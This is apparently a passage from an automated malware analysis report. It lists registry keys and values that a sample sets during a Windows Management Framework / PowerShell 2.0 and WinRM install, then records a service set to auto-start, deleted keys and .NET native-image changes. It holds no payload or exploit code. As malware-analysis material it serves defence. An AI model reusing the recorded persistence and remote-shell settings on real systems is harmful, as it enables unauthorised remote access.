"ParameterMessageFile" = "%systemroot%\system32\kernel32.dll"

[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\NumMethods]
"(Default)" = "6"

[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnService" = "RPCSS, HTTP, HTTPFilter"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"TypesSupported" = "7"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}]
"(Default)" = "IWSManEx"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"TSAware" = "1"

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"(Default)" = "Microsoft Windows Remote Shell Host"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"UninstallCommand" = "%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"

[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostModuleName" = "%System%\WindowsPowerShell\v1.0\Microsoft.PowerShell.ConsoleHost.dll"

[HKCR\WSMan.Automation\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"

[HKCR\WSMan.Automation.1\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"

[HKLM\System\CurrentControlSet\Services\WinRM]
"Type" = "32"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\130:aef98\iis]
"PathIISAdmin" = "%System%\inetsrv\iisadmin"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\VersionIndependentProgID]
"(Default)" = "WSMan.Automation"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\System\CurrentControlSet\Services\WinRM]
"DisplayName" = "Windows Remote Management (WS-Management)"

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\130:aef98\iis]
"PathWWWRoot" = "C:\Inetpub\wwwroot"
"PathIISHelp" = "%WinDir%\Help\iishelp"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\0\win32]
"(Default)" = "%System%\WsmAuto.dll"

[HKCR\Microsoft.PowerShellConsole.1]
"EditFlags" = "131072"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstalledDate" = "3/24/2016"
"ReleaseType" = "Software Update"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\130:aef98\iis]
"UpgradeType" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCR\WSMan.InternalAutomation.1\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\130:aef98\iis]
"PathInetsrv" = "%System%\inetsrv"

[HKCR\WSMan.Automation\CurVer]
"(Default)" = "WSMan.Automation.1"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\ProgID]
"(Default)" = "WSMan.InternalAutomation.1"

[HKCR\.ps1xml]
"(Default)" = "Microsoft.PowerShellXmlData.1"

[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\NumMethods]
"(Default)" = "4"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKLM\System\CurrentControlSet\Services\WinRM]
"ImagePath" = "%WinDir%\System32\svchost.exe -k WinRM"

[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.PNF" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"MaxSize" = "15728640"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C1 42 E1 06 8C C2 76 2C 71 10 11 22 CA 06 DB 5F"

[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "PSFactoryBuffer"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "PSFactoryBuffer"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Sources" = "PowerShell"

[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"MaxSize" = "20971520"

[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"ServiceDll" = "%SystemRoot%\system32\WsmSvc.dll"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\1033]
"Install" = "1"

[HKCR\Microsoft.PowerShellScript.1\DefaultIcon]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe,1"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\VersionIndependentProgID]
"(Default)" = "WSMan.InternalAutomation"

[HKCR\Microsoft.PowerShellData.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"

[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"seRVicemAIN" = "ServiceMain"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"TypesSupported" = "7"

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstalledBy" = "%CurrentUserName%"

[HKCR\Microsoft.PowerShellData.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"AppID" = "{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerVersion" = "6.1.29.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayIcon" = "%System%\WindowsPowerShell\v1.0\WTRInstaller.ico"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\.psc1]
"Content Type" = "application/PowerShell"

[HKCR\Microsoft.PowerShellXmlData.1]
"EditFlags" = "131072"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}]
"(Default)" = "WSMan InternalAutomation Class"

[HKCR\Microsoft.PowerShellData.1]
"EditFlags" = "131072"

[HKCR\Microsoft.PowerShellXmlData.1]
"FriendlyTypeName" = "Windows PowerShell XML Document"

[HKLM\System\CurrentControlSet\Services\WinRM]
"ErrorControl" = "1"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"ARPLink" = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}]
"(Default)" = "IWSManResourceLocatorInternal"

[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"AutoBackupLogFiles" = "0"

[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"

[HKCR\WSMan.InternalAutomation\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoRepair" = "1"

[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}]
"(Default)" = "WinRM WMI Provider for User Profile"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"UninstallString" = "%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\WSMan.Automation.1]
"(Default)" = "WSMan Automation Class"

[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"Install" = "1"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"RuntimeVersion" = "v2.0.50727"

[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}]
"(Default)" = "IWSManProvHost"

[HKCR\Microsoft.PowerShellModule.1]
"FriendlyTypeName" = "Windows PowerShell Script Module"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageVersion" = "1.0"

[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"ThreadingModel" = "Both"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"ServerExecutable" = "%System%\winrshost.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayName" = "Windows Management Framework Core"
"InstallDate" = "20160324"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"Publisher" = "Microsoft Corporation"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"AllowProtectedRenames" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"ReleaseType" = "Software Update"

[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\NumMethods]
"(Default)" = "4"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsDelSignature"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}]
"(Default)" = "IWSMan"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PowerShellVersion" = "2.0"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\ProgID]
"(Default)" = "WSMan.Automation.1"

[HKCR\Microsoft.PowerShellScript.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnGroup" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\130:aef98\iis]
"PathIISSamples" = "C:\Inetpub\iissamples"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}]
"(Default)" = "WSMan Automation Class"

[HKCR\Microsoft.PowerShellScript.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"

[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "IHost"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Publisher" = "Microsoft Corporation"

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"

[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"(Default)" = "%System%\wsmplpxy.dll"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ApplicationBase" = "%System%\WindowsPowerShell\v1.0"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerName" = "Update.exe"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"AppID" = "{3feb2f63-0eec-4b96-84ab-da1307e0117c}"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"(Default)" = "Microsoft Windows Remote Shell Host"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageName" = "Windows Management Framework Core"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\Microsoft.PowerShellScript.1]
"FriendlyTypeName" = "Windows PowerShell Script"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\WinRM]
"Description" = "Allows access to management information from local and remote machines."

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}]
"(Default)" = "IWSManSession"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"HelpLink" = "http://go.microsoft.com/fwlink/?LinkID=163790"

[HKCR\WSMan.InternalAutomation.1]
"(Default)" = "WSMan Internal Class"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Type" = "Update"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCR\.psm1]
"(Default)" = "Microsoft.PowerShellModule.1"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\HELPDIR]
"(Default)" = "%System%"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsVerifyHash"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Microsoft.PowerShell]
"ConfigXML" = ""

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsCreateHash"

[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.inf" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"

[HKCR\WSMan.Automation]
"(Default)" = "WSMan Automation Class"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"file" = "%systemroot%\system32\config\EventForwarding-Operational.Evt"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsIsMyFileType"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"URLInfoAbout" = "http://go.microsoft.com/fwlink/?LinkID=163792"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"RegistryLocation" = " HKLM,SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930"

[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\NumMethods]
"(Default)" = "4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"TypesSupported" = "7"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ\Regular]
"Guid" = "24b9a175-8716-40e0-9b2b-785de75b1e67"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"SupportsCompatListeners" = "1"

[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "IShell"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"(Default)" = "%System%\winrmprov.dll"

[HKCR\.ps1]
"(Default)" = "Microsoft.PowerShellScript.1"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"Version" = "1.0"

[HKLM\System\CurrentControlSet\Services\WinRM]
"ObjectName" = "NT AUTHORITY\NetworkService"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"(Default)" = "%System%\winrshost.exe"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"Active" = "1"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"(Default)" = "Microsoft Windows WSMan Provider Host"

[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"PID" = "89383-100-0001260-04309"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostAssemblyName" = "Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"

[HKCR\.psd1]
"(Default)" = "Microsoft.PowerShellData.1"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}]
"(Default)" = "IWSManEnumerator"

[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
"ServicePackCachePath" = "c:\windows\ServicePackFiles\ServicePackCache"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"EventMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"Version" = "1.0"

The following service will be launched automatically at system boot up:

[HKLM\System\CurrentControlSet\Services\SENS]
"Start" = "2"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\130:aef98]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\130:aef98\iis]

The process mscorsvw.exe:3464 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2C 20 75 4A D7 FD F8 00 1B D1 75 3E E7 01 65 D7"

The process mscorsvw.exe:3456 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\7ac727df\3ef4663b]
"F" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ConfigMask" = "4361"
"DisplayName" = "Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"SIG" = "EC BB F6 79 DE 07 9A 4F A7 CE DF 48 D6 49 CE 93"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"LastModTime" = "8E F1 06 7C 03 86 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\3ef4663b\f\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\7ac727df\3ef4663b]
"F" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"DisplayName" = "Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A AE 27 87 CA 54 D0 88 B2 64 50 F7 9B 9F D7 1E"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "91"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"MVID" = "13 FC 3D AE F5 85 09 8F 11 91 1F 8F 72 AC 1C EA"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\7ac727df\3ef4663b]
"F" = ""

